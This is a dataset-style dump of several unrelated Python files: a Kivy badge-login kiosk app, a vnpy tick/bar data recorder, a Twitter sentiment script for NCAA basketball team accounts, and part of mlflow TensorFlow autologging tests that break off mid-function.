source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
client.py | import time
import uuid
from threading import Thread
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.config import Config
from kivy.lang import Builder
from kivy.logger import Logger
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import NoTransition, Screen, ScreenManager
from kivy.uix.textinput import TextInput
import _client.badge as badge
import _shared.data as data
import configparser
cparser = configparser.ConfigParser()
cparser.read(['default_config.ini', 'config.ini'])
def print(*text):
if len(text) == 0:
text = ['']
Logger.debug(f'{__file__}: {" ".join(str(text))}')
data.init('client')
Config.read(os.path.join(cparser.get('directories', 'client'), 'kivy.ini'))
style = Builder.load_file(os.path.join(cparser.get('directories', 'client'), 'style.kv'))
sm = ScreenManager(transition=NoTransition())
keys = [
'q,w,e,r,t,z,u,i,o,p',
'a,s,d,f,d,g,h,j,k,l',
'y,x,c,v,b,n,m',
'.,@,del,SPEICHERN'
]
focused = None
times = {}
badge_ = None
user = None
itemlayout = None
registration_fields = None
timeout = None
def renew_timeout():
global timeout
if timeout is not None:
Clock.unschedule(timeout)
timeout = Clock.schedule_once(logout, 30)
def login(b):
global user
user = data.login_user(b)
refresh()
sm.current = 'Kiosk'
def logout(*args):
global user, badge_
user = None
badge_ = None
RS.ids['firstname'].text = ''
RS.ids['lastname'].text = ''
RS.ids['email'].text = ''
Clock.schedule_once(RS.ids['firstname'].refocus, 0.1)
sm.current = 'Login'
def refresh(content='all'):
if content == 'balance':
KS.ids['balance'].text = str(user.balance) + ' CHF'
elif content == 'userinformation':
KS.ids['balance'].text = str(user.balance) + ' CHF'
KS.ids['name'].text = user.firstname + '\n' + user.lastname
KS.ids['avatar'].source = user.avatar
KS.ids['otp'].text = 'OTP\n' + str(user.otp)
elif content == 'products':
itemlayout.refresh()
elif content == 'all':
refresh('balance')
refresh('userinformation')
refresh('products')
def on_badge(b):
global badge_
if b != badge_:
logout()
renew_timeout()
badge_ = b
if data.user_exists(b):
login(b)
else:
sm.current = 'Register'
class Keyboard(BoxLayout):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.orientation = 'vertical'
for y in keys:
row = BoxLayout()
row.orientation = 'horizontal'
for x in y.upper().split(','):
row.add_widget(
Button(text=x, font_size=30, on_press=self.on_press))
self.add_widget(row)
def on_press(self, instance):
renew_timeout()
global times, user, registration_fields
if focused is not None:
Clock.schedule_once(focused.refocus, 0.1)
# logger.debug('Application: '+time.time() - times.get(instance.text, time.time() - 100))
if time.time() - times.get(instance.text, time.time() - 100) > .05:
times.update({instance.text: time.time()})
# logger.debug('Application: '+instance.text)
if focused is not None:
if instance.text not in ('DEL', 'SPEICHERN'):
focused.insert_text(instance.text)
elif instance.text == 'DEL':
focused.do_backspace()
elif instance.text == 'SPEICHERN':
if '' in (RS.ids['firstname'].text, RS.ids['lastname'].text, RS.ids['email'].text):
b = BoxLayout()
b.orientation = 'vertical'
b.add_widget(
Label(text='Bitte alle Felder ausfüllen!'))
btn = Button(text='Ok')
b.add_widget(btn)
p = Popup()
p.title = 'Fehler'
p.content = b
btn.bind(on_press=p.dismiss)
p.open()
return
# Create user
user = data.register_user(
RS.ids['firstname'].text, RS.ids['lastname'].text, RS.ids['email'].text, badge_)
logout()
class LoginScreen(Screen):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class KioskScreen(Screen):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def logout(self):
logout()
blank = data.default_avatar
def get_balance(self):
if user is not None:
return user.balance
else:
return 'Error'
def get_avatar(self):
if user is not None:
return user.avatar
else:
return data.default_avatar
class RegisterScreen(Screen):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
items = []
def enable_items(*args, **kwargs):
for item in items:
item.disabled = False
def disable_items():
for item in items:
item.disabled = True
class Item(Button):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.prid = 0
self.name = ""
self.stock = 0
self.price = 0
self.id = uuid.uuid1().hex
def on_press(self):
renew_timeout()
disable_items()
user.buy(self.prid)
refresh('balance')
Clock.schedule_once(enable_items, 2)
class ItemLayout(GridLayout):
def __init__(self, *args, **kwargs):
global itemlayout
super().__init__(*args, **kwargs)
self.sm = sm
self.refresh()
itemlayout = self
def refresh(self):
global items
self.clear_widgets()
items.clear()
for product in data.get_products().items():
b = Item()
b.prid = product[0]
b.name = product[1]['name']
b.stock = product[1]['stock']
b.price = product[1]['price']
b.text = f'''{b.name}\n{b.price} CHF'''
self.add_widget(b)
items.append(b)
class DetailInput(TextInput):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _on_focus(self, instance, value):
global focused
if value:
focused = instance
super()._on_focus(instance, value)
def refocus(self, *args):
self.focus = True
LS = LoginScreen(name='Login')
KS = KioskScreen(name='Kiosk')
RS = RegisterScreen(name='Register')
sm.add_widget(LS)
sm.add_widget(KS)
sm.add_widget(RS)
sm.current = 'Login'
class KioskApp(App):
def build(self):
return sm
# try:
badge.Logger = Logger
badgesensor = Thread(target=badge.run, args=[on_badge, ])
badgesensor.start()
app = KioskApp()
app.run() |
thread.py | from threading import Thread
import queue
class ThreadWithReturnValue(object):
def __init__(self, target=None, args=(), **kwargs):
self._que = queue.Queue()
self._t = Thread(target=lambda q, arg1, kwargs1: q.put(target(*arg1, **kwargs1)),
args=(self._que, args, kwargs), )
self._t.start()
def join(self):
self._t.join()
return self._que.get()
|
engine.py | """"""
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
class RecorderEngine(BaseEngine):
""""""
setting_filename = "data_recorder_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.queue = Queue()
self.thread = Thread(target=self.run)
self.active = False
self.tick_recordings = {}
self.bar_recordings = {}
self.bar_generators = {}
self.load_setting()
self.register_event()
self.start()
self.put_event()
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.tick_recordings = setting.get("tick", {})
self.bar_recordings = setting.get("bar", {})
def save_setting(self):
""""""
setting = {
"tick": self.tick_recordings,
"bar": self.bar_recordings
}
save_json(self.setting_filename, setting)
def run(self):
""""""
while self.active:
try:
task = self.queue.get(timeout=1)
task_type, data = task
if task_type == "tick":
database_manager.save_tick_data([data])
elif task_type == "bar":
database_manager.save_bar_data([data])
except Empty:
continue
def close(self):
""""""
self.active = False
if self.thread.isAlive():
self.thread.join()
def start(self):
""""""
self.active = True
self.thread.start()
def add_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.bar_recordings:
self.write_log(f"已在K线记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.bar_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加K线记录成功:{vt_symbol}")
def add_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.tick_recordings:
self.write_log(f"已在Tick记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.tick_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加Tick记录成功:{vt_symbol}")
def remove_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.bar_recordings:
self.write_log(f"不在K线记录列表中:{vt_symbol}")
return
self.bar_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除K线记录成功:{vt_symbol}")
def remove_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.tick_recordings:
self.write_log(f"不在Tick记录列表中:{vt_symbol}")
return
self.tick_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除Tick记录成功:{vt_symbol}")
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
if tick.vt_symbol in self.tick_recordings:
self.record_tick(tick)
if tick.vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(tick.vt_symbol)
bg.update_tick(tick)
def process_contract_event(self, event: Event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
if vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings:
self.subscribe(contract)
def write_log(self, msg: str):
""""""
event = Event(
EVENT_RECORDER_LOG,
msg
)
self.event_engine.put(event)
def put_event(self):
""""""
tick_symbols = list(self.tick_recordings.keys())
tick_symbols.sort()
bar_symbols = list(self.bar_recordings.keys())
bar_symbols.sort()
data = {
"tick": tick_symbols,
"bar": bar_symbols
}
event = Event(
EVENT_RECORDER_UPDATE,
data
)
self.event_engine.put(event)
def record_tick(self, tick: TickData):
""""""
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
""""""
task = ("bar", copy(bar))
self.queue.put(task)
def get_bar_generator(self, vt_symbol: str):
""""""
bg = self.bar_generators.get(vt_symbol, None)
if not bg:
bg = BarGenerator(self.record_bar)
self.bar_generators[vt_symbol] = bg
return bg
def subscribe(self, contract: ContractData):
""""""
req = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
|
NCAA.py | def installations():
import os
os.system("pip install nltk")
import nltk
nltk.download('punkt')
nltk.download('vader_lexicon')
import os
os.system("pip install requests")
os.system("pip install requests")
os.system("pip install requests_oauthlib")
installations()
from requests_oauthlib import OAuth1Session
import requests
from datetime import datetime
import time
import re
import json
import textwrap
import nltk
from nltk.sentiment import SentimentIntensityAnalyzer
from nltk import word_tokenize,sent_tokenize
import requests
from requests_oauthlib import OAuth1Session
import textwrap
from deephaven.DateTimeUtils import convertDateTime, minus, convertPeriod, currentTime, plus
from deephaven import DynamicTableWriter
import deephaven.Types as dht
import threading
from deephaven.TableTools import newTable, stringCol
from deephaven import Aggregation as agg, as_list
from deephaven.conversion_utils import NULL_INT
from deephaven.TableTools import newTable, intCol, stringCol
bearer_token = '<YOUR BEARER TOKEN>'
# Max results per time bin, 10-100
max_results = 100
# Time intervals to split data
time_bins = 15
#seconds between requests
time_to_sleep = 60
#how long to keep listening in minutes
time_alive = 10
# How many days to go back. Max 7 for non-acemdic searches
time_history = 1
max_id =int(1502096953148444672)
search_terms=[]
teams =['acu_mbb', 'af_mbb', 'zipsmbb', 'alabamambb', 'bulldogs_hoops', 'bamastatembb', 'ualbanymbb', 'bravessports', 'au_mbasketball', 'appstatembb', 'aplayersprogram', 'sundevilhoops', 'razorbackmbb', 'astatemb', 'uapblionsroar', 'armywp_mbb', 'auburnmbb', 'austinpeaymbb', 'ballstatembb', 'baylormbb', 'buknightsmbb', 'belmontmbb', 'bcuhoops', 'binghamtonmbb', 'broncosportsmbb', 'bcmbb', 'terriermbb', 'bgsumhoops', 'bradleyumbb', 'brownbasketball', 'bryanthoops', 'bucknell_mbb', 'ubmenshoops', 'butlermbb', 'byubasketball', 'calpolymbb', 'csub_mbb', 'fullertonmbb', 'csunmbb', 'calmbball', 'cbumbb', 'gocamelsmbb', 'griffs_mbb', 'ucambb', 'ccsu_mbb', 'ucf_mbb', 'cmumensbball', 'cofcbasketball', 'csu_mbball', 'charlottembb', 'gomocsmbb', 'chicagostatembb', 'gobearcatsmbb', 'clemsonmbb', 'csu_basketball', 'coastalmbb', 'colgatembb', 'cubuffsmbb', 'csumbasketball', 'culionsmbb', 'uconnmbb', 'coppinmbb', 'cubigredhoops', 'bluejaymbb', 'dartmouthmbk', 'davidsonmbb', 'daytonmbb', 'delawarembb', 'dsumbb', 'du_mhoops', 'depaulhoops', 'detroitmbb', 'dixiestatebball', 'drakebulldogsmb', 'drexelmbb', 'dukembb', 'duqmbb', 'ecubasketball', 'etsu_mbb', 'eiubasketball', 'ekuhoops', 'emuhoops', 'ewumbb', 'elonmbasketball', 'ueathletics_mbb', 'stagsmensbball', 'fdu_mbb', 'gatorsmbk', 'famuathletics', 'fau_hoops', 'fgcu_mbb', 'fiuhoops', 'fsuhoops', 'fordhammbb', 'fresnostatembb', 'furmanhoops', 'gwu_mbk', 'masonmbb', 'gw_mbb', 'georgetownhoops', 'ugabasketball', 'gsathletics_mbb', 'georgiastatembb', 'gtmbb', 'zagmbb', 'gsu_tigers', 'gcu_mbb', 'gbphoenixmbb', 'hampton_mbb', 'hartfordmbb', 'harvardmbb', 'hawaiimbb', 'hpumbb', 'hofstrambb', 'hcrossmbb', 'uhcougarmbk', 'hbubasketball', 'humensbb', 'vandalhoops', 'idahostatebball', 'illinimbb', 'redbird_mbb', 'uicflamesmbb', 'uiwmbb', 'indianambb', 'indstmbb', 'ionagaelsmbb', 'iowahoops', 'cyclonembb', 'iupuimensbball', 'gojsutigersmbb', 'jax_mbb', 'jsu_mbb', 'jmumbasketball', 'kuhoops', 'kstatembb', 'ksuowlsmbb', 'kentstmbb', 'kentuckymbb', 'lasallembb', 'lafayettembb', 'lamarmbb', 'lehighmbb', 'libertymbb', 'lipscombmbb', 'littlerockmbb', 'lbsuhoops', 'liubasketball', 'longwoodmbb', 'ragincajunsmbb', 'latechhoops', 'ulm_mbb', 'louisvillembb', 'lmulionsmbb', 'ramblersmbb', 'loyolambb', 'lsubasketball', 'blackbearsmbb', 'jaspersmbb', 'maristmbb', 'marquettembb', 'herdmbb', 'terrapinhoops', 'eshawkshoops', 'umassbasketball', 'mcneesembb', 'memphis_mbb', 'mercermbb', 'merrimackmbb', 'caneshoops', 'miamioh_bball', 'umichbball', 'msu_basketball', 'mt_mbb', 'mke_mbb', 'gophermbb', 'hailstatembk', 'mvsudevilsports', 'mizzouhoops', 'msubearshoops', 'monmouthbball', 'montanagrizbb', 'msubobcatsmbb', 'msueaglesmbb', 'morganstbears', 'mounthoops', 'racershoops', 'navybasketball', 'huskerhoops', 'omahambb', 'nevadahoops', 'unhmbb', 'unmlobombb', 'nmstatembb', 'privateersmbb', 'niagarambb', 'nicholls_mbb', 'njithoops', 'nsu_bball', 'una_mbb', 'unc_basketball', 'ncatbasketball', 'nccu_mbb', 'packmensbball', 'undmbasketball', 'ndsumbb', 'ospreysmbb', 'meangreenmbb', 'gonumbasketball', 'naubasketball', 'unc_bears', 'gohuskiesmbb', 'unimbb', 'nkunorsembb', 'numensbball', 'nsudemonsmbb', 'ndmbb', 'oaklandmbb', 'ohiombasketball', 'ohiostatehoops', 'ou_mbball', 'osumbb', 'odumbb', 'olemissmbb', 'orumbb', 'oregonmbb', 'beavermbb', 'pacificmensbb', 'pennbasketball', 'pennstatembb', 'peppbasketball', 'pitt_mbb', 'pilothoops', 'psuviksmbb', 'pvamupanthers', 'bluehosehoops', 'princeton_hoops', 'pcfriarsmbb', 'boilerball', 'mastodonmbb', 'qu_mbb', 'radfordmbb', 'rhodymbb', 'ricebasketball', 'spidermbb', 'ridermbb', 'rmumbasketball', 'rutgersmbb', 'sachornetsmbb', 'shu_menshoops', 'sjuhawks_mbb', 'saintlouismbb', 'saintmaryshoops', 'peacocksmbb', 'bearkatsmbb', 'samfordmbb', 'usdmbb', 'aztec_mbb', 'usfdonsmbb', 'sjsumbb', 'santaclarahoops', 'seattleumbb', 'setonhallmbb', 'sienambb', 'siuembb', 'smubasketball', 'wearesouth_mbb', 'gamecockmbb', 'scstateathletic', 'upstatemb', 'sdcoyotesmbb', 'gojacksmbb', 'usfmbb', 'semombb', 'slu_hoops', 'jaguarhoops', 'siu_basketball', 'southernmissmbb', 'suubasketball', 'bonniesmbb', 'sfbkmbb', 'redflashmbb', 'stjohnsbball', 'stanfordmbb', 'sfa_mbb', 'stetsonmbb', 'stonybrookmbb', 'cuse_mbb', 'tarletonmbb', 'tcubasketball', 'tumbbhoops', 'vol_hoops', 'tsutigersmbb', 'ttu_basketball', 'skyhawkhoops', 'texasmbb', 'aggiembk', 'islandersmbb', 'tsumenshoops', 'txstatembb', 'texastechmbb', 'uta_mbb', 'citadelhoops', 'toledombb', 'towson_mbb', 'troytrojansmbb', 'greenwavembb', 'tumbasketball', 'uab_mbb', 'ucdavismbb', 'ucimbb', 'ucrmbb', 'ucsdmbb', 'ucsbbasketball', 'uclambb', 'riverhawkmbb', 'umbc_mbb', 'kcroosmbb', 'uncavlmbb', 'uncgbasketball', 'uncwmenshoops', 'therunninrebels', 'usc_hoops', 'utahmbb', 'usubasketball', 'uvumbb', 'utep_mbb', 'utrgvmbb', 'utsambb', 'valpobasketball', 'vandymbb', 'uvmmbb', 'novambb', 'uvamenshoops', 'vcu_hoops', 'vmi_basketball', 'hokiesmbb', 'wagner_mbb', 'wakembb', 'uw_mbb', 'wsumenshoops', 'weberstatembb', 'wvuhoops', 'wcu_mbb', 'wiumenshoops', 'wku basketball', 'wmumbb', 'goshockersmbb', 'wmtribembb', 'winthrop_mbb', 'badgermbb', 'woffordmbb', 'wsu_mbb', 'wyo_mbb', 'xaviermbb', 'yale_basketball', 'ysumenshoops']
search_string=''
for i in range(0,len(teams)):
search_string = search_string + teams[i] +' OR '
wrapper = textwrap.TextWrapper(width=512)
temp_terms = wrapper.wrap(text=search_string)
for element in temp_terms:
if(element[:2]=='OR'):
element = element[2:]
if(element[-2:]=='OR ' or element[-2:]=='OR'):
element = element[:len(element)-2]
search_terms.append(element)
def make_table():
return newTable(stringCol("team", teams))
teams_table = make_table()
#twitter function to create header
def create_headers(bearer_token):
headers = {
"Authorization": "Bearer {}".format(bearer_token),
"User-Agent": "v2FullArchiveSearchPython"}
return headers
# twitter url for recent tweets
search_url = "https://api.twitter.com/2/tweets/search/recent"
#connect to twitter with above header
def connect_to_endpoint(url, headers, params):
response = requests.request("GET", search_url, headers=headers, params=params)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
if response.status_code == 429:
raise Exception(response.status_code, response.text)
time.sleep(120)
return response.json()
# get tweets, if not enough data return null
def get_tweets(query_params):
headers = create_headers(bearer_token)
json_response = connect_to_endpoint(search_url, headers, query_params)
try:
if(len(json_response['data']))>2:
return(json_response['data'])
else: return " "
except KeyError:
print("KeyError in data")
return " "
def build_default_sia_classifier_func(classifier):
def a(strn):
sentiment = classifier.polarity_scores(strn)
return [sentiment["pos"], sentiment["neu"], sentiment["neg"], sentiment["compound"]]
return a
classifier = build_default_sia_classifier_func(SentimentIntensityAnalyzer())
# twitter paramters for tweets from eariler in day
def get_query_params_hist(search_term, start_time, end_time):
return {'query': search_term,
'start_time': start_time,
'end_time': end_time,
'max_results': max_results,
'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
'next_token': {}}
#twitter paramters for live tweets
def get_query_params_live(search_term, max_id):
return {'query': search_term,
'since_id': max_id,
'max_results': max_results,
'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
'next_token': {}}
def write_data(all_text, tableWriter):
for t in all_text:
try:
id = float(t['id'])
if max_id < float(t['id']):
globals()['max_id'] = int(t['id'])
dateTime = t['created_at'][:-1]+" NY"
retweet_count = t['public_metrics']['retweet_count']
reply_count = t['public_metrics']['reply_count']
like_count = t['public_metrics']['like_count']
quote_count= t['public_metrics']['quote_count']
tableWriter.logRowPermissive(t['text'].lower(), convertDateTime(dateTime), int(retweet_count), int(reply_count), int(like_count), int(quote_count), t['id'])
except TypeError:
print("string indices must be integers")
return max_id
def thread_func(search_terms, tableWriter):
global max_id
for i in range(1, time_bins):
for search_term in search_terms:
start_time = str(plus(convertDateTime(str(currentTime())[:11]+'00:00:00.000 NY'),convertPeriod("T"+str(int(i-1))+"H")))[:-9]+'Z'
end_time = str(plus(convertDateTime(str(currentTime())[:11]+'00:00:00.000 NY'),convertPeriod("T"+str(int(i))+"H")))[:-9]+'Z'
query_params = get_query_params_hist(search_term, start_time, end_time)
all_text = get_tweets(query_params)
max_id = write_data(all_text, tableWriter)
for i in range(time_alive*time_to_sleep):
for search_term in search_terms:
query_params = get_query_params_live(search_term, max_id)
all_text = get_tweets(query_params)
max_id = write_data(all_text, tableWriter)
time.sleep(time_to_sleep)
def make_table(term):
tableWriter = DynamicTableWriter(
["Text", "DateTime", "Retweet_count", "Reply_count", "Like_count", "Quote_count", "Id"],
[dht.string, dht.datetime, dht.int_, dht.int_, dht.int_, dht.int_,dht.string])
thread = threading.Thread(target=thread_func, args=[term, tableWriter])
thread.start()
return tableWriter.getTable()
data_sia= make_table(search_terms).update("Sentiment = (org.jpy.PyListWrapper)classifier(Text)",
"Positive = (double)Sentiment[0]",
"Neutral = (double)Sentiment[1]",
"Negative = (double)Sentiment[2]",
"Compound = (double)Sentiment[3]").sortDescending("DateTime")
def match_text(text):
return [ele for ele in teams if(ele in text)]
tweet_matching = data_sia.update("team = (org.jpy.PyListWrapper)match_text(Text)").where("(team).size()>0").update("team =(String)team[0]")
teams_table_sia = teams_table.join(tweet_matching,"team=team", "Positive, Negative,Compound,Retweet_count")\
.sort("team")\
.aggBy(as_list([agg.AggAvg("Avg_Pos= Positive"),agg.AggAvg("Avg_Neg= Negative"),agg.AggAvg("Avg_Compound= Compound"),agg.AggAvg("Avg_retweet= Retweet_count"),agg.AggCount("Number_tweets")]), "team")
|
test_tensorflow2_autolog.py | # pep8: disable=E501
import collections
import pytest
import sys
import pickle
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback
import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture
def clear_tf_keras_imports():
"""
Simulates a state where `tensorflow` and `keras` are not imported by removing these
libraries from the `sys.modules` dictionary. This is useful for testing the interaction
between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
"""
sys.modules.pop("tensorflow", None)
sys.modules.pop("keras", None)
@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
"""
Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
be tested successfully
"""
mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data,
random_one_hot_labels,
epochs=num_training_epochs,
initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=1)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
